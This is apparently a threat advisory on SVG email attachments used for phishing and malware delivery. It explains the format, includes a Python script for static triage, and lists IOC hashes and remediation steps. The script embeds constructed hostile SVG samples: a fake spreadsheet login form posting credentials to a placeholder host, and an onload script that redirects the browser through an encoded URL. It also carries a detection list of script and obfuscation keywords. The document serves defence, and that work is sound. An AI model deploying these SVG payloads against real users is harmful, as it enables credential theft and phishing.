
Severity
High
Analysis Summary
Threat actors are increasingly using Scalable Vector Graphics (SVG) attachments to deliver malware or display phishing forms while evading detection. Most images on the internet are raster formats such as JPG and PNG: the picture is a grid of tiny squares called pixels, and each pixel holds its own color value.
SVG takes a different approach. Instead of storing pixels, an SVG file is text (XML markup) that describes the lines, shapes, and text to draw as geometric instructions. Because the graphic is rendered from those instructions, it scales to any size without losing shape or quality, which is why it is so common in browser applications that must display correctly at varying resolutions.
SVG attachments are not new to phishing; researchers have documented them in earlier QBot malware campaigns and as a way to conceal malicious scripts. The samples observed here and elsewhere show how flexible the format is: beyond drawing graphics, an SVG can embed HTML through the <foreignObject> element and can execute JavaScript when the graphic is loaded.
That combination lets threat actors build SVG attachments that render a working phishing form rather than just a picture. A recent attachment, shown below, draws a fake Excel spreadsheet with an embedded login form; when the victim fills it in, the entered credentials are transmitted to the attackers.

Other SVG attachments in a recent campaign pose as official documents or as requests for additional information and lure the user into clicking a download button, which fetches malware from a remote website. Further campaigns embed JavaScript in the SVG so that merely opening the image redirects the browser to a site hosting a phishing form.
The core problem is detection: because these files are essentially text that describes an image, security software rarely flags them. Only one or two of the samples uploaded to VirusTotal were detected at all. On the other hand, legitimate email almost never carries SVG attachments, so their presence is itself a warning sign. Unless you are a developer who expects to receive SVG files, the safest course is to delete any email that contains one.
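The abuse patterns described above (HTML embedded via <foreignObject>, a credential form posting to a remote host, and JavaScript that fires on load to redirect the browser) are all visible in the SVG text itself, so a mail gateway or analyst can triage an attachment statically. The script below is an added example written for this advisory, not code from the original page or from any vendor; the three SVG samples are constructed here to mirror the described lures, and example.invalid is a placeholder domain, not an indicator from the campaign.

```python
"""Static triage of an SVG attachment for the abuse patterns described above.

Added example, not code from the advisory. The two hostile samples and the
benign one are constructed; example.invalid is a reserved placeholder domain.
"""
import re
import xml.etree.ElementTree as ET

# Elements that let an SVG do more than draw: run script, embed HTML
# (<foreignObject>), or present a form to the viewer.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "form", "input", "embed", "object"}
# Attributes that can carry a URL (an xlink: namespace prefix is stripped below).
URL_ATTRS = {"href", "src", "action", "data"}
EXTERNAL_URL = re.compile(r"^\s*(https?:|//)", re.IGNORECASE)
SCRIPT_OR_DATA_URL = re.compile(r"^\s*(javascript|vbscript|data):", re.IGNORECASE)
# Fragments typical of redirect or obfuscation payloads inside <script> bodies.
SCRIPT_BODY_HINTS = ("location", "atob(", "eval(", "fromcharcode", "unescape(", "document.write")


def _local(name):
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def triage_svg(svg_text):
    """Return a list of (reason, detail) findings; an empty list means nothing suspicious."""
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        # Not well-formed XML: either not an SVG at all or deliberately mangled.
        return [("parse-error", str(exc))]
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(("active-element", tag))
        if tag == "script" and el.text:
            body = el.text.lower()
            for hint in SCRIPT_BODY_HINTS:
                if hint in body:
                    findings.append(("script-body", hint))
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):            # onload=, onclick=, ... run JavaScript
                findings.append(("event-handler", "%s@%s" % (tag, name)))
            elif name in URL_ATTRS:
                if SCRIPT_OR_DATA_URL.match(value):
                    findings.append(("script-or-data-url", value[:40]))
                elif EXTERNAL_URL.match(value):  # form action / link / image pulled from elsewhere
                    findings.append(("external-url", value[:60]))
    return findings


def is_suspicious(svg_text):
    """True when any finding is present; an attachment-blocking policy can key off this."""
    return bool(triage_svg(svg_text))


# --- constructed samples (synthetic, modelled on the lures described in the advisory) ---
PHISHING_FORM_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xhtml="http://www.w3.org/1999/xhtml" width="600" height="400">
  <rect width="600" height="400" fill="#ffffff"/>
  <text x="20" y="30" font-family="sans-serif">Invoice_Q3.xlsx</text>
  <foreignObject x="20" y="60" width="560" height="300">
    <xhtml:form action="https://example.invalid/collect" method="post">
      <xhtml:input name="email" placeholder="Email"/>
      <xhtml:input name="password" type="password"/>
      <xhtml:input type="submit" value="Open document"/>
    </xhtml:form>
  </foreignObject>
</svg>"""

REDIRECT_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1"
     onload="window.location.replace(atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv'))">
  <script><![CDATA[ setTimeout(function(){ location.href = atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv'); }, 500); ]]></script>
</svg>"""

BENIGN_LOGO_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <circle cx="50" cy="50" r="40" fill="#1e90ff"/>
  <text x="35" y="90" font-size="12">Logo</text>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("phishing form", PHISHING_FORM_SVG),
                          ("redirect", REDIRECT_SVG),
                          ("logo", BENIGN_LOGO_SVG)):
        verdict = "SUSPICIOUS" if is_suspicious(sample) else "clean"
        print("%-14s %s %s" % (label, verdict, triage_svg(sample)))
```

The checker is a heuristic for triage, not a replacement for the advisory's advice to quarantine SVG attachments outright: an attacker can split strings or build element names at runtime to dodge the body hints, and compressed .svgz files must be gunzipped before parsing. When feeding untrusted mail into this in production, parse with defusedxml rather than the standard library so that entity-expansion tricks cannot exhaust the scanner.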
Impact
- Credential Theft
- Security Bypass
- Unauthorized Access
Indicators of Compromise
MD5
- d3acfbea0cfc732e819301c490b3bb89
- 62fe867077a03214208fa5c9f9f1c743
- c3bd20a26cad5cd8d5ff8174f70966f0
SHA-256
- ae08802026984b53438e1b3b2f2aa21839c165fae88493bfb8f31c4d064b7068
- 06f49c74464fb6a4e3d5db59a7da616feae660c50ae74fdee9b4fc0f94730c51
- 0e857464f66465ad0308d8f779b2448a0a4575556e2cffee2e574ce99ddf18ad
SHA-1
- 28c089a180a3981555da829f69f4728ff55b6e30
- dc6fdf0eee07fb6d57d140f7eafcad376a01968f
- 0a32570679a73a5852b48473646e72f37c46577c
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets.
- Patch and upgrade all platforms and software promptly, and make timely patching a standard security policy.
- Employ network intrusion detection and prevention systems to monitor and block malicious network activities.
- Implement network segmentation to limit lateral movement for attackers within the network.
- Never trust or open links and attachments received from unknown sources/senders.
- Implement advanced email filtering to detect and block phishing emails.
- Employ updated and robust endpoint protection solutions to detect and block malware.
- Develop and test an incident response plan to ensure a swift and effective response to security incidents.
- Enhance logging and monitoring capabilities to detect anomalous activities and unauthorized access.
- Conduct regular security audits and penetration testing to identify and address potential vulnerabilities.
- Regularly back up critical data and ensure that backup and recovery procedures are in place.